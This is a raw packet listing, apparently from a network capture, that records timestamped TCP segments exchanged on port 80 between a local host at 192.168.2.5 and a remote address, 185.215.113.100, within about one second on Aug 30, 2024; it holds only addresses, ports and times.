Aug 30, 2024 00:48:11.111996889 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.112009048 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.112159014 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.112170935 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.112181902 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.112196922 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.112206936 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.112207890 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.112220049 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.112232924 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.112237930 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.112243891 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.112255096 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.112256050 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.112268925 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.112276077 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.112282038 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.112293959 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.112298012 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.112307072 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.112328053 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.112360001 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.112755060 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.112766981 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.112776995 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.112787008 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.112797976 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.112804890 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.112808943 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.112821102 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.112838030 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.112863064 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.112878084 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.112888098 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.112898111 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.112907887 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.112916946 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.112919092 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.112927914 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.112935066 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.112943888 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.112956047 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.112963915 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.112965107 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.112976074 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.112987041 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.112988949 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.112998009 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.113008022 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.113008976 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.113018990 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.113034964 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.113044024 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.113071918 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.113735914 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.113748074 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.113756895 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.113766909 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.113776922 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.113781929 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.113789082 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.113799095 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.113805056 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.113821983 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.113826990 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.113838911 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.113847971 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.113857985 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.113863945 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.113868952 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.113883972 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.113893986 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.113894939 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.113907099 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.113917112 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.113926888 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.113931894 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.113936901 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.113945961 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.113950014 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.113961935 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.113970995 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.113976955 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.113981962 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.114001036 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.114015102 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.114655972 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.114670992 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.114681005 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.114691973 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.114702940 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.114706039 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.114717007 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.114727020 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.114738941 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.114748955 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.114749908 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.114761114 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.114772081 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.114783049 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.114793062 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.114799976 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.114809036 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.114810944 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.114821911 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.114831924 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.114833117 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.114842892 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.114846945 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.114855051 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.114866018 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.114876032 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.114880085 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.114912033 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.115437031 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.115448952 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.115458965 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.115470886 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.115482092 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.115485907 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.115492105 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.115504026 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.115510941 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.115528107 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.115556955 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.198767900 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.198782921 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.198793888 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.198853016 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.198863029 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.198864937 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.198878050 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.198899984 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.198909044 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.198925972 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.198951960 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.198964119 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.198993921 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.199135065 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.199172974 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.199203014 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.199213982 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.199239016 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.199245930 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.199284077 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.199326992 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.199337959 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.199350119 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.199364901 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.199384928 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.199493885 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.199515104 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.199527025 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.199537992 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.199547052 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.199548960 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.199574947 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.199598074 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.199755907 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.199765921 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.199775934 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.199788094 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.199798107 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.199804068 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.199809074 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.199836016 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.199851036 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.199969053 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.199980021 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.199990034 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.200001955 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.200012922 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.200016975 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.200045109 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.200285912 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.200295925 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.200306892 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.200316906 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.200329065 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.200330973 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.200340986 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.200352907 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.200361967 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.200364113 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.200376987 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.200387955 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.200392008 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.200398922 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.200409889 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.200412035 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.200423002 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.200432062 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.200462103 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.200731993 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.200742960 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.200752974 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.200763941 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.200774908 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.200778008 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.200809956 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.200942993 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.200954914 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.200963974 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.200975895 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.200987101 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.200987101 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.201021910 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.201071024 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.201082945 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.201092958 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.201102972 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.201107979 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.201113939 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.201128960 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.201138973 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.201139927 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.201152086 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.201162100 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.201169014 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.201175928 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.201188087 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.201194048 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.201199055 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.201210976 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.201210976 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.201236010 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.201262951 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.201889992 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.201900959 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.201910973 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.201924086 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.201934099 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.201944113 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.201946974 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.201956987 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.201967955 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.201980114 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.201987982 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.201991081 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.202002048 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.202003002 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.202013016 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.202024937 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.202025890 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.202033043 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.202040911 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.202044964 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.202105045 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.202120066 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.202544928 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.202559948 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.202569962 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.202579975 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.202590942 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.202598095 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.202603102 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.202631950 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.202636003 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.202646971 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.202661037 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.202672958 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.202678919 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.202682972 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.202694893 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.202704906 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.202706099 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.202706099 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.202718019 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.202728987 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.202739000 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.202739000 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.202750921 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.202761889 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.202771902 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.202773094 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.202785015 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.202789068 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.202796936 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.202807903 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.202812910 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.202825069 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.202855110 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.203480959 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.203493118 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.203500986 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.203512907 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.203524113 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.203531027 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.203542948 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.203561068 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.203563929 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.203563929 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.203578949 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.203588009 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.203591108 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.203598022 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.203603983 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.203618050 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.203619957 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.203628063 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.203634024 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.203640938 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.203650951 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.203653097 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.203664064 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.203675032 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.203680992 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.203687906 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.203702927 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.203712940 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.203722000 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.203725100 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.203739882 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.203747988 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.203774929 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.287637949 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.287667990 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.287679911 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.287698984 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.287734985 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.287744045 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.287755966 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.287766933 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.287785053 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.287818909 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.287854910 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.287867069 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.287877083 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.287905931 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.287931919 CEST	49704	80	192.168.2.5	185.215.113.100
Aug 30, 2024 00:48:11.287967920 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.287980080 CEST	80	49704	185.215.113.100	192.168.2.5
Aug 30, 2024 00:48:11.287990093 CEST	80	49704	185.215.113.100	192.168.2.5
